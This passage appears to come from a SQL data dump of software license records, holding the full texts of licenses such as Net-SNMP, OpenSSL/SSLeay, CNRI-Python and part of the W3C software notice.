Code\nor Executable Files of this Work shall not be considered part of this Work\nand will not be subject to the terms of this License.\n\n4. Patent License. Subject to the terms and conditions of this License, each\nAuthor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge,\nroyalty-free, irrevocable (except as stated in this section) patent license\nto make, have made, use, import, and otherwise transfer the Work.\n\n5. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You agree not to remove any of the original copyright, patent, trademark,\nand attribution notices and associated disclaimers that may appear in the\nSource Code or Executable Files.\n\nb. You agree not to advertise or in any way imply that this Work is a product\nof Your own.\n\nc. The name of the Author may not be used to endorse or promote products derived\nfrom the Work without the prior written consent of the Author.\n\nd. You agree not to sell, lease, or rent any part of the Work. This does not\nrestrict you from including the Work or any part of the Work inside a larger\nsoftware distribution that itself is being sold. The Work by itself, though,\ncannot be sold, leased or rented.\n\ne. You may distribute the Executable Files and Source Code only under the\nterms of this License, and You must include a copy of, or the Uniform Resource\nIdentifier for, this License with every copy of the Executable Files or Source\nCode You distribute and ensure that anyone receiving such Executable Files\nand Source Code agrees that the terms of this License apply to such Executable\nFiles and/or Source Code. You may not offer or impose any terms on the Work\nthat alter or restrict the terms of this License or the recipients\' exercise\nof the rights granted hereunder. You may not sublicense the Work. You must\nkeep intact all notices that refer to this License and to the disclaimer of\nwarranties. You may not distribute the Executable Files or Source Code with\nany technological measures that control access or use of the Work in a manner\ninconsistent with the terms of this License.\n\nf. You agree not to use the Work for illegal, immoral or improper purposes,\nor on pages containing illegal, immoral or improper material. The Work is\nsubject to applicable export laws. You agree to comply with all such laws\nand regulations that may apply to the Work after Your receipt of the Work.\n\n6. Representations, Warranties and Disclaimer. THIS WORK IS PROVIDED \"AS IS\",\n\"WHERE IS\" AND \"AS AVAILABLE\", WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES OR\nCONDITIONS OR GUARANTEES. YOU, THE USER, ASSUME ALL RISK IN ITS USE, INCLUDING\nCOPYRIGHT INFRINGEMENT, PATENT INFRINGEMENT, SUITABILITY, ETC. AUTHOR EXPRESSLY\nDISCLAIMS ALL EXPRESS, IMPLIED OR STATUTORY WARRANTIES OR CONDITIONS, INCLUDING\nWITHOUT LIMITATION, WARRANTIES OR CONDITIONS OF MERCHANTABILITY, MERCHANTABLE\nQUALITY OR FITNESS FOR A PARTICULAR PURPOSE, OR ANY WARRANTY OF TITLE OR NON-INFRINGEMENT,\nOR THAT THE WORK (OR ANY PORTION THEREOF) IS CORRECT, USEFUL, BUG-FREE OR\nFREE OF VIRUSES. YOU MUST PASS THIS DISCLAIMER ON WHENEVER YOU DISTRIBUTE\nTHE WORK OR DERIVATIVE WORKS.\n\n7. Indemnity. You agree to defend, indemnify and hold harmless the Author\nand the Publisher from and against any claims, suits, losses, damages, liabilities,\ncosts, and expenses (including reasonable legal or attorneys\' fees) resulting\nfrom or relating to any use of the Work by You.\n\n8. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL THE AUTHOR OR THE PUBLISHER BE LIABLE TO YOU ON ANY LEGAL\nTHEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES\nARISING OUT OF THIS LICENSE OR THE USE OF THE WORK OR OTHERWISE, EVEN IF THE\nAUTHOR OR THE PUBLISHER HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 9. Termination.\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of any term of this License. Individuals or entities\nwho have received Derivative Works from You under this License, however, will\nnot have their licenses terminated provided such individuals or entities remain\nin full compliance with those licenses. Sections 1, 2, 6, 7, 8, 9, 10 and\n11 will survive any termination of this License.\n\nb. If You bring a copyright, trademark, patent or any other infringement claim\nagainst any contributor over infringements You claim are made by the Work,\nyour License from such contributor to the Work ends automatically.\n\nc. Subject to the above terms and conditions, this License is perpetual (for\nthe duration of the applicable copyright in the Work). Notwithstanding the\nabove, the Author reserves the right to release the Work under different license\nterms or to stop distributing the Work at any time; provided, however that\nany such election will not serve to withdraw this License (or any other license\nthat has been, or is required to be, granted under the terms of this License),\nand this License will continue in full force and effect unless terminated\nas stated above.\n\n10. Publisher. The parties hereby confirm that the Publisher shall not, under\nany circumstances, be responsible for and shall not have any liability in\nrespect of the subject matter of this License. The Publisher makes no warranty\nwhatsoever in connection with the Work and shall not be liable to You or any\nparty on any legal theory for any damages whatsoever, including without limitation\nany general, special, incidental or consequential damages arising in connection\nto this license. The Publisher reserves the right to cease making the Work\navailable to You at any time without notice\n\n 11. Miscellaneous\n\na. This License shall be governed by the laws of the location of the head\noffice of the Author or if the Author is an individual, the laws of location\nof the principal place of residence of the Author.\n\nb. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nLicense, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nc. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\nd. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed herein. There are no understandings, agreements\nor representations with respect to the Work not specified herein. The Author\nshall not be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Author and You.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(268,'Net-SNMP','---- Part 1: CMU/UCD copyright notice: (BSD like) -----\n\nCopyright 1989, 1991, 1992 by Carnegie Mellon University\n\nDerivative Work - 1996, 1998-2000 Copyright 1996, 1998-2000 The Regents of\nthe University of California\n\nAll Rights Reserved\n\nPermission to use, copy, modify and distribute this software and its documentation\nfor any purpose and without fee is hereby granted, provided that the above\ncopyright notice appears in all copies and that both that copyright notice\nand this permission notice appear in supporting documentation, and that the\nname of CMU and The Regents of the University of California not be used in\nadvertising or publicity pertaining to distribution of the software without\nspecific written permission.\n\nCMU AND THE REGENTS OF THE UNIVERSITY OF CALIFORNIA DISCLAIM ALL WARRANTIES\nWITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS. IN NO EVENT SHALL CMU OR THE REGENTS OF THE UNIVERSITY OF CALIFORNIA\nBE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\nWHATSOEVER RESULTING FROM THE LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\nACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR\nIN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n---- Part 2: Networks Associates Technology, Inc copyright notice (BSD) -----\n\nCopyright (c) 2001-2003, Networks Associates Technology, Inc All rights reserved.\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* Neither the name of the Networks Associates Technology, Inc nor the names\nof its contributors may be used to endorse or promote products derived from\nthis software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS\'\'\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n ---- Part 3: Cambridge Broadband Ltd. copyright notice (BSD) -----\n\nPortions of this code are copyright (c) 2001-2003, Cambridge Broadband Ltd.\nAll rights reserved. Redistribution and use in source and binary forms, with\nor without modification, are permitted provided that the following conditions\nare met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* The name of Cambridge Broadband Ltd. may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER ``AS IS\'\' AND ANY EXPRESS\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\nOR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n\n---- Part 4: Sun Microsystems, Inc. copyright notice (BSD) -----\n\nCopyright © 2003 Sun Microsystems, Inc., 4150 Network Circle, Santa Clara,\nCalifornia 95054, U.S.A. All rights reserved.\n\nUse is subject to license terms below.\n\nThis distribution may include materials developed by third parties.\n\nSun, Sun Microsystems, the Sun logo and Solaris are trademarks or registered\ntrademarks of Sun Microsystems, Inc. in the U.S. and other countries.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* Neither the name of the Sun Microsystems, Inc. nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS\'\'\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n ---- Part 5: Sparta, Inc copyright notice (BSD) -----\n\nCopyright (c) 2003-2009, Sparta, Inc All rights reserved. Redistribution and\nuse in source and binary forms, with or without modification, are permitted\nprovided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* Neither the name of Sparta, Inc nor the names of its contributors may be\nused to endorse or promote products derived from this software without specific\nprior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS\'\'\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n ---- Part 6: Cisco/BUPTNIC copyright notice (BSD) -----\n\nCopyright (c) 2004, Cisco, Inc and Information Network Center of Beijing University\nof Posts and Telecommunications. All rights reserved. Redistribution and use\nin source and binary forms, with or without modification, are permitted provided\nthat the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* Neither the name of Cisco, Inc, Beijing University of Posts and Telecommunications,\nnor the names of their contributors may be used to endorse or promote products\nderived from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS\'\'\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n---- Part 7: Fabasoft R&D Software GmbH & Co KG copyright notice (BSD) -----\n\nCopyright (c) Fabasoft R&D Software GmbH & Co KG, 2003 oss@fabasoft.com Author:\nBernhard Penz\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* The name of Fabasoft R&D Software GmbH & Co KG or any of its subsidiaries,\nbrand or product names may not be used to endorse or promote products derived\nfrom this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER ``AS IS\'\' AND ANY EXPRESS\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\nOR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n\n---- Part 8: Apple Inc. copyright notice (BSD) -----\n\nCopyright (c) 2007 Apple Inc. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. Neither the name of Apple Inc. (\"Apple\") nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY APPLE AND ITS CONTRIBUTORS \"AS IS\" AND ANY EXPRESS\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL APPLE OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n ---- Part 9: ScienceLogic, LLC copyright notice (BSD) -----\n\nCopyright (c) 2009, ScienceLogic, LLC All rights reserved. Redistribution\nand use in source and binary forms, with or without modification, are permitted\nprovided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* Neither the name of ScienceLogic, LLC nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS\'\'\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(269,'OpenSSL','OpenSSL License\n\nCopyright (c) 1998-2008 The OpenSSL Project. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. All advertising materials mentioning features or use of this software must\ndisplay the following acknowledgment: \"This product includes software developed\nby the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)\"\n\n4. The names \"OpenSSL Toolkit\" and \"OpenSSL Project\" must not be used to endorse\nor promote products derived from this software without prior written permission.\nFor written permission, please contact openssl-core@openssl.org.\n\n5. Products derived from this software may not be called \"OpenSSL\" nor may\n\"OpenSSL\" appear in their names without prior written permission of the OpenSSL\nProject.\n\n6. Redistributions of any form whatsoever must retain the following acknowledgment:\n\"This product includes software developed by the OpenSSL Project for use in\nthe OpenSSL Toolkit (http://www.openssl.org/)\"\n\nTHIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS\'\' AND ANY EXPRESSED\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL THE OpenSSL PROJECT OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\nBUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\nOF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nThis product includes cryptographic software written by Eric Young (eay@cryptsoft.com).\nThis product includes software written by Tim Hudson (tjh@cryptsoft.com).\nOriginal SSLeay License\n\nCopyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)\n\nAll rights reserved.\n\nThis package is an SSL implementation written by Eric Young (eay@cryptsoft.com).\nThe implementation was written so as to conform with Netscapes SSL.\n\nThis library is free for commercial and non-commercial use as long as the\nfollowing conditions are aheared to. The following conditions apply to all\ncode found in this distribution, be it the RC4, RSA, lhash, DES, etc., code;\nnot just the SSL code. The SSL documentation included with this distribution\nis covered by the same copyright terms except that the holder is Tim Hudson\n(tjh@cryptsoft.com).\n\nCopyright remains Eric Young\'s, and as such any Copyright notices in the code\nare not to be removed. If this package is used in a product, Eric Young should\nbe given attribution as the author of the parts of the library used. This\ncan be in the form of a textual message at program startup or in documentation\n(online or textual) provided with the package.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the copyright notice, this list\nof conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. All advertising materials mentioning features or use of this software must\ndisplay the following acknowledgement:\n\n\"This product includes cryptographic software written by Eric Young (eay@cryptsoft.com)\"\n\nThe word \'cryptographic\' can be left out if the rouines from the library being\nused are not cryptographic related :-).\n\n4. If you include any Windows specific code (or a derivative thereof) from\nthe apps directory (application code) you must include an acknowledgement:\n\"This product includes software written by Tim Hudson (tjh@cryptsoft.com)\"\n\nTHIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS\'\' AND ANY EXPRESS OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\nAUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\nOF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\nSTRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY\nWAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGE.\n\nThe licence and distribution terms for any publically available version or\nderivative of this code cannot be changed. i.e. this code cannot simply be\ncopied and put under another distribution licence [including the GNU Public\nLicence.]\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(270,'CNRI-Python','CNRI OPEN SOURCE LICENSE AGREEMENT\n\nIMPORTANT: PLEASE READ THE FOLLOWING AGREEMENT CAREFULLY.\n\nBY CLICKING ON \"ACCEPT\" WHERE INDICATED BELOW, OR BY COPYING, INSTALLING OR\nOTHERWISE USING PYTHON 1.6, beta 1 SOFTWARE, YOU ARE DEEMED TO HAVE AGREED\nTO THE TERMS AND CONDITIONS OF THIS LICENSE AGREEMENT.\n\n1. This LICENSE AGREEMENT is between the Corporation for National Research\nInitiatives, having an office at 1895 Preston White Drive, Reston, VA 20191\n(\"CNRI\"), and the Individual or Organization (\"Licensee\") accessing and otherwise\nusing Python 1.6, beta 1 software in source or binary form and its associated\ndocumentation, as released at the www.python.org Internet site on August 4,\n2000 (\"Python 1.6b1\").\n\n2. Subject to the terms and conditions of this License Agreement, CNRI hereby\ngrants Licensee a non-exclusive, royalty-free, world-wide license to reproduce,\nanalyze, test, perform and/or display publicly, prepare derivative works,\ndistribute, and otherwise use Python 1.6b1 alone or in any derivative version,\nprovided, however, that CNRIs License Agreement is retained in Python 1.6b1,\nalone or in any derivative version prepared by Licensee.\n\nAlternately, in lieu of CNRIs License Agreement, Licensee may substitute the\nfollowing text (omitting the quotes): \"Python 1.6, beta 1, is made available\nsubject to the terms and conditions in CNRIs License Agreement. This Agreement\nmay be located on the Internet using the following unique, persistent identifier\n(known as a handle): 1895.22/1011. This Agreement may also be obtained from\na proxy server on the Internet using the URL:http://hdl.handle.net/1895.22/1011\".\n\n3. In the event Licensee prepares a derivative work that is based on or incorporates\nPython 1.6b1 or any part thereof, and wants to make the derivative work available\nto the public as provided herein, then Licensee hereby agrees to indicate\nin any such work the nature of the modifications made to Python 1.6b1.\n\n4. CNRI is making Python 1.6b1 available to Licensee on an \"AS IS\" basis.\nCNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF\nEXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND DISCLAIMS ANY REPRESENTATION\nOR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT\nTHE USE OF PYTHON 1.6b1 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n\n5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE SOFTWARE\nFOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT\nOF USING, MODIFYING OR DISTRIBUTING PYTHON 1.6b1, OR ANY DERIVATIVE THEREOF,\nEVEN IF ADVISED OF THE POSSIBILITY THEREOF.\n\n6. This License Agreement will automatically terminate upon a material breach\nof its terms and conditions.\n\n7. This License Agreement shall be governed by and interpreted in all respects\nby the law of the State of Virginia, excluding conflict of law provisions.\nNothing in this License Agreement shall be deemed to create any relationship\nof agency, partnership, or joint venture between CNRI and Licensee. This License\nAgreement does not grant permission to use CNRI trademarks or trade name in\na trademark sense to endorse or promote products or services of Licensee,\nor any third party.\n\n8. By clicking on the \"ACCEPT\" button where indicated, or by copying, installing\nor otherwise using Python 1.6b1, Licensee agrees to be bound by the terms\nand conditions of this License Agreement.\n\nACCEPT\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(271,'W3C-19980720','W3C® SOFTWARE NOTICE AND LICENSE\n\nCopyright (c) 1994-2002 World Wide Web Consortium, (Massachusetts Institute\nof Technology, Institut National de Recherche en Informatique et en Automatique,\nKeio University). All Rights Reserved. http://www.w3.org/Consortium/Legal/\n\nThis W3C work (including software, documents, or other related items) is being\nprovided by the copyright holders under the following license. By obtaining,\nusing and/or copying this work, you (the licensee) agree that you have read,\nunderstood, and will comply with the following terms and conditions:\n\nPermission to use, copy, modify, and distribute this software and its documentation,\nwith or without modification, for any purpose and without fee or royalty is\nhereby granted, provided that you include the following on ALL copies of the\nsoftware and documentation or portions thereof, including modifications, that\nyou make:\n\n1. The full text of this NOTICE in a location viewable to users of the redistributed\nor derivative work.\n\n2. Any pre-existing intellectual property disclaimers, notices, or terms and\nconditions. If none exist, a short notice of the following form (hypertext\nis preferred, text is permitted) should be used within the body of any redistributed\nor derivative code: \"Copyright © [$date-of-software] World Wide Web Consortium,\n(Massachusetts Institute of Technology, Institut National de Recherche en\nInformatique et en Automatique, Keio University). All Rights Reserved. http://www.w3.org/Consortium/Legal/\"\n\n3. Notice of any changes or modifications to the W3C files, including the\ndate changes were made. (We recommend you provide URIs to the location from\nwhich the code is derived.)\n\nTHIS SOFTWARE AND DOCUMENTATION IS PROVIDED \"AS IS,\" AND COPYRIGHT 